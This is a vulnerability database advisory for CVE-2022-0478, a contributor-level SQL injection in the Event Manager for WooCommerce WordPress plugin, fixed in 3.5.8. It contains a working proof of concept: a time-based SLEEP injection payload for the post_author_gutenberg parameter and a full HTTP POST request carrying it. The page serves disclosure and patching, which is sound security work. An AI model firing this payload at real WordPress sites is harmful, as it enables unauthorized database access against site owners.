WordPress Plugin Vulnerabilities

Event Manager for WooCommerce < 3.5.8 - Contributor+ SQL Injection

Description

The plugin does not validate and escape the post_author_gutenberg parameter before using it in a SQL statement when creating/editing events, which could allow users with a role as low as contributor to perform SQL Injection attacks

Proof of Concept

Create or edit an event as a contributor, intercept the request and append the following payload to the post_author_gutenberg POST parameter: /**/WHERE/**/ID=VALID_POST_EVENT_ID/**/AND/**/SLEEP(10)/**/--

POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1742
Connection: close
Cookie: [contributor+]
Upgrade-Insecure-Requests: 1

_wpnonce=89e8e9bf38&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=mep_events&original_post_status=pending&post_ID=5724&meta-box-order-nonce=b0848a8368&closedpostboxesnonce=d77823a21d&original_post_title=Contrib+SQLi&post_title=Contrib+SQLi&samplepermalinknonce=3929b239b6&content=&wp-preview=&original_publish=Submit+for+Review&publish=Submit+for+Review&tax_input%5Bmep_cat%5D%5B%5D=0&tax_input%5Bmep_org%5D%5B%5D=0&mep_event_template=default-theme.php&mep_fw_nonce=bd4f075693&mep_list_thumbnail=&post_author_gutenberg=5/**/WHERE/**/ID=5724/**/AND/**/SLEEP(10)/**/--&mep_org_address=0&mep_location_venue=&mep_street=&mep_city=&mep_state=&mep_postcode=&mep_country=&mep_event_ticket_type_nonce=3a65192659&option_name_t%5B%5D=&option_price_t%5B%5D=&option_qty_t%5B%5D=&option_default_qty_t%5B%5D=&option_rsv_t%5B%5D=&option_sale_end_date%5B%5D=&option_sale_end_time%5B%5D=&option_qty_t_type%5B%5D=&mep_events_extra_price_nonce=14d31c6699&option_name%5B%5D=&option_price%5B%5D=&option_qty%5B%5D=&option_qty_type%5B%5D=&event_start_date=&event_start_time=&event_end_date=&event_end_time=00%3A00&event_more_start_date%5B%5D=&event_more_start_time%5B%5D=&event_more_end_date%5B%5D=&event_more_end_time%5B%5D=&mep_event_ricn_text_nonce=8e31f2b499&mep_rich_text_status=enable&mep_rt_event_status=EventRescheduled&mep_rt_event_attandence_mode=OfflineEventAttendanceMode&mep_rt_event_prvdate=2022-02-02+13%3A25%3A04&mep_event_reg_btn_nonce=c702a3ef44&mep_event_sku=&mep_reg_status=on&mep_show_end_datetime=yes&mep_event_reg_btn_nonce=c702a3ef44&mep_available_seat=on&mep_event_reset_btn_nonce=11ce7e0cfd&mp_event_virtual_type_des=&mep_member_only_user_role%5B%5D=all&mep_fw_nonce=bd4f075693&mep_event_cc_email_text=&excerpt=

Affects Plugins

Plugin icon
mage-eventpress
Fixed in 3.5.8

References

CVE
CVE-2022-0478
URL
https://plugins.trac.wordpress.org/changeset/2671860

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Rafael Castilho
Submitter
Rafael Castilho
Submitter website
https://castilho101.github.io
Submitter twitter
castilho101
Verified
Yes
WPVDB ID
d881d725-d06b-464f-a25e-88f41b1f431f

Timeline

Publicly Published
2022-02-21 (about 2 years ago)
Added
2022-02-21 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other

Published
Title
Published
2021-01-29
Title
Modern Events Calendar Lite < 5.16.6 - Authenticated SQL Injection
Published
2015-12-11
Title
Link Log < 2.1 - SQL Injection
Published
2020-11-12
Title
Good LMS < 2.1.5 - Unauthenticated SQL Injection
Published
2022-04-05
Title
Tipsacarrier < 1.5.0.5 - Unauthenticated SQLi
Published
2014-08-01
Title
Editorial Calendar 2.6 - Post Query Multiple Filter SQL Injection